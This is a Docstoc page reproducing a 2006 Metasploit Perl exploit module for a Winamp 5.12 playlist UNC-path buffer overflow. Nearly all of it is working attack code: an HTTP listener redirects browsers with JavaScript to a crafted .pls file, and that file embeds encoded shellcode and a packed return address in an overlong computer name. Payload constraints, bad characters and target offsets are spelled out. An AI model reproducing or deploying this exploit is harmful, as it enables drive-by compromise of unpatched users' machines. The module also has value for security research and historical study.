Docstoc

Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta

Document Sample
Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta Powered By Docstoc
					                          Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                     Page 1/6
  1
  2    ##
  3    # This file is part of the Metasploit Framework and may be redistributed
  4    # according to the licenses defined in the Authors field below. In the
  5    # case of an unknown or missing license, this file defaults to the same
  6    # license as the core Framework (dual GPLv2 and Artistic). The latest
  7    # version of the Framework can always be obtained from metasploit.com.
  8    ##
  9
  10   package Msf::Exploit::winamp_playlist_unc;
  11
  12   use   strict;
  13   use   base "Msf::Exploit";
  14   use   Pex::Text;
  15   use   IO::Socket::INET;
  16   use   IPC::Open3;
  17
  18    my $advanced =
  19     {
  20           ’Gzip’           => [1, ’Enable gzip content encoding’],
  21           ’Chunked’        => [1, ’Enable chunked transfer encoding’],
  22           ’Humor’           => [0, ’Enable humorous song names’],
  23     };
  24
  25   my $info =
  26     {
  27           ’Name’                 => ’Winamp Playlist UNC Path Computer Name Overflow’,
  28           ’Version’            => ’$Revision: 1.3 $’,
  29           ’Authors’            =>
  30             [
  31                       ’H D Moore <hdm [at] metasploit.com’,
  32                       ’Faithless <rhyskidd [at] gmail.com>’,
  33                ],
  34
  35             ’Description’    =>
  36               Pex::Text::Freeform(qq{
  37                        This module exploits a vulnerability in the Winamp media player.
  38             This flaw is triggered when a audio file path is specified, inside a
  39             playlist, that consists of a UNC path with a long computer name. This
  40             module delivers the playlist via the browser.
  41   }),
  42
  43             ’Arch’               => [ ’x86’ ],
  44             ’OS’                  => [ ’win32’, ’winxp’, ’win2003’ ],
  45             ’Priv’              => 0,
  46
  47             ’AutoOpts’       => { ’EXITFUNC’ => ’process’ },
  48             ’UserOpts’       =>
  49               {
  50                       ’HTTPPORT’ => [ 1, ’PORT’, ’The local HTTP listener port’, 8080           ],
  51                       ’HTTPHOST’ => [ 0, ’HOST’, ’The local HTTP listener host’, "0.0.0.0" ],
  52                       ’REALHOST’ => [ 0, ’HOST’, ’External address to use for redirects (NAT)’ ],
H D Moore                                                                                                 01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta             Page 2/6
  53              },
  54
  55            ’Payload’            =>
  56              {
  57                        ’Space’    => 526,
  58                        ’BadChars’ => "\x00\x5c\x2f\x0a\x0d\x20",
  59                        ’Keys’      => [’−bind’],
  60
  61                        # Landing on \x5c\x5c trashes esp, restore from ecx
  62                        ’PrependEncoder’ => "\x87\xe1",
  63
  64                        # Disable nop sleds completely (dont modify ecx)
  65                        ’MinNops’ => 0,
  66                        ’MaxNops’ => 0,
  67              },
  68            ’Refs’                =>
  69              [
  70                        [’BID’, ’16410’],
  71                        [’URL’, ’http://milw0rm.com/id.php?id=1458/’],
  72                        [’URL’, ’http://secunia.com/advisories/18649/’],
  73              ],
  74
  75            ’DefaultTarget’ => 0,
  76            ’Targets’         =>
  77              [
  78                      # Return to exe, 0x0d is replaced by 0x00 >:−)
  79                      [ ’Winamp 5.12 Universal’, 0x0d45fece ]
  80              ],
  81
  82            ’Keys’                => [ ’winamp’ ],
  83
  84            ’DisclosureDate’ => ’Jan 29 2006’,
  85      };
  86
  87    sub new {
  88            my $class = shift;
  89            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
  90            return($self);
  91    }
  92
  93    sub Exploit
  94    {
  95            my $self = shift;
  96            my $server = IO::Socket::INET−>new(
  97                    LocalHost => $self−>GetVar(’HTTPHOST’),
  98                    LocalPort => $self−>GetVar(’HTTPPORT’),
  99                    ReuseAddr => 1,
  100                   Listen    => 1,
  101                   Proto     => ’tcp’
  102               );
  103           my $client;
  104

H D Moore                                                                                        01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                           Page 3/6
  105           # Did the listener create fail?
  106           if (not defined($server)) {
  107                   $self−>PrintLine("[−] Failed to create local HTTP listener on " . $self−>GetVar(’HTTPPORT’));
  108                   return;
  109           }
  110
  111           my $httphost = $self−>GetVar(’HTTPHOST’);
  112           $httphost = Pex::Utils::SourceIP(’1.2.3.4’) if $httphost eq ’0.0.0.0’;
  113
  114           $self−>PrintLine("[*] Waiting for connections to http://". $httphost .":". $self−>GetVar(’HTTPPORT’) ."/");
  115
  116           while (defined($client = $server−>accept())) {
  117                   $self−>HandleHttpClient(Msf::Socket::Tcp−>new_from_socket($client));
  118           }
  119
  120           return;
  121   }
  122
  123   sub HandleHttpClient
  124   {
  125           my $self = shift;
  126           my $fd     = shift;
  127
  128           # Set the remote host information
  129           my ($rport, $rhost) = ($fd−>PeerPort, $fd−>PeerAddr);
  130
  131           # Read the HTTP command
  132           my ($cmd, $url, $proto) = split / /, $fd−>RecvLine(10);
  133
  134           # Read the HTTP headers
  135           my $headers;
  136           while ( (my $line = $fd−>RecvLine(10))) {
  137                   $headers .= $line;
  138                   last if $line eq "\r\n";
  139           }
  140
  141           if ($url !~ /\.pls/i) {
  142                   $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
  143                   my $content =
  144                           "<html><script>".
  145                           "document.location=’".RandomPath().".pls’".
  146                           "</script><body>".
  147                           "One second please...</body></html>";
  148
  149                     $fd−>Send($self−>BuildResponse($content));
  150                     $fd−>Close;
  151                     return;
  152           }
  153
  154           my $target_idx      = $self−>GetVar(’TARGET’);
  155           my $target          = $self−>Targets−>[$target_idx];
  156           my $shellcode       = $self−>GetVar(’EncodedPayload’)−>Payload;
H D Moore                                                                                                                     01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                                     Page 4/6
  157
  158           my $name = Pex::Text::AlphaNumText(int(rand(32)+1));
  159           my $file = Pex::Text::AlphaNumText(1026);
  160
  161           substr($file, 1022, 4, pack(’V’, $target−>[1]));
  162           substr($file, 0, length($shellcode), $shellcode);
  163
  164           # Too many and it takes too long to load...
  165           my $pcnt = int(rand(10)+10);
  166           my $play =
  167                   "[playlist]\r\n".
  168
  169                               $self−>RandomNames($pcnt).
  170
  171                               "File".   ($pcnt+1). "=\\\\$file\r\n" .
  172                               "Title". ($pcnt+1). "=$name\r\n".
  173                               "Length". ($pcnt+1). "=".sprintf("%x",rand(1024)+1)."\r\n".
  174
  175                               "NumberOfEntries=".($pcnt+1)."\r\n".
  176                               "Version=2\r\n";
  177
  178           $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
  179
  180
  181           $fd−>Send($self−>BuildResponse($play, "audio/x−scpls"));
  182
  183           # Prevents IE from throwing an error in some cases
  184           select(undef, undef, undef, 0.1);
  185
  186           $fd−>Close();
  187   }
  188
  189   sub RandomPath {
  190           my $self = shift;
  191           my $path;
  192
  193           while (length($path) < 32) {
  194                   $path .= "/" . Pex::Text::AlphaNumText(int(rand(30) + 5));
  195           }
  196           return $path;
  197   }
  198
  199   sub RandomNames {
  200           my $self = shift;
  201           return $self−>RandomNamesFun(@_) if $self−>GetVar(’Humor’);
  202           my $scnt = shift;
  203
  204           my $ppad = ’’;
  205
  206           for my $idx (1..$scnt) {
  207                   my $pname = Pex::Text::AlphaNumText(int(rand(32)+1));
  208                   my $pfile = Pex::Text::AlphaNumText(int(rand(32)+1)).".mp3";
H D Moore                                                                                                                               01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta           Page 5/6
  209                     $ppad .=
  210                             "File".    ($idx). "=".$pfile."\r\n" .
  211                             "Title". ($idx). "=".$pname."\r\n".
  212                              "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  213           }
  214           return $ppad;
  215   }
  216
  217   sub BuildResponse {
  218            my ($self, $content, $ctype) = @_;
  219            $ctype ||= "text/html";
  220
  221           my $response =
  222             "HTTP/1.1 200 OK\r\n" .
  223             "Content−Type: $ctype\r\n";
  224
  225           if ($self−>GetVar(’Gzip’)) {
  226                    $response .= "Content−Encoding: gzip\r\n";
  227                    $content = $self−>Gzip($content);
  228           }
  229           if ($self−>GetVar(’Chunked’)) {
  230                    $response .= "Transfer−Encoding: chunked\r\n";
  231                    $content = $self−>Chunk($content);
  232           } else {
  233                    $response .= ’Content−Length: ’ . length($content) . "\r\n" .
  234                      "Connection: close\r\n";
  235           }
  236
  237           $response .= "\r\n" . $content;
  238
  239           return $response;
  240   }
  241
  242   sub Chunk {
  243           my ($self, $content) = @_;
  244
  245           my $chunked;
  246           while (length($content)) {
  247                   my $chunk = substr($content, 0, int(rand(10) + 1), ’’);
  248                   $chunked .= sprintf(’%x’, length($chunk)) . "\r\n$chunk\r\n";
  249           }
  250           $chunked .= "0\r\n\r\n";
  251
  252           return $chunked;
  253   }
  254
  255   sub Gzip {
  256           my $self = shift;
  257           my $data = shift;
  258           my $comp = int(rand(5))+10;
  259
  260           my($wtr, $rdr, $err);
H D Moore                                                                                     01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta         Page 6/6
  261
  262            my $pid = open3($wtr, $rdr, $err, ’gzip’, ’−’.$comp, ’−c’, ’−−force’);
  263            print $wtr $data;
  264            close ($wtr);
  265            local $/;
  266
  267            return (<$rdr>);
  268   }
  269
  270
  271   sub RandomNamesFun {
  272           my $self = shift;
  273           my $scnt = shift;
  274           my @ffun =
  275           (
  276                   "Angelina vs Rosie O − Butter Time",
  277                   "Richards Gerbil Adventure",
  278                   "Elton John Bachelor Party",
  279                   "Paris Hilton Greased Chihuahua",
  280                   "OH MY GOD",
  281                   "SOMEONE IS OWNING",
  282                   "MY WINAMP!",
  283           );
  284
  285            my $ppad = ’’;
  286
  287            for my $idx (1..$scnt) {
  288                    my $pname = $ffun[ $idx % scalar(@ffun) ];
  289                    $ppad .=
  290                            "File".    ($idx). "=".$pname."\r\n" .
  291                            "Title". ($idx). "=".$pname."\r\n".
  292                             "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  293            }
  294            return $ppad;
  295   }
  296   1;
  297
  298   # milw0rm.com [2006−01−31]




H D Moore                                                                                    01/31/2006

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:46
posted:5/24/2010
language:English
pages:6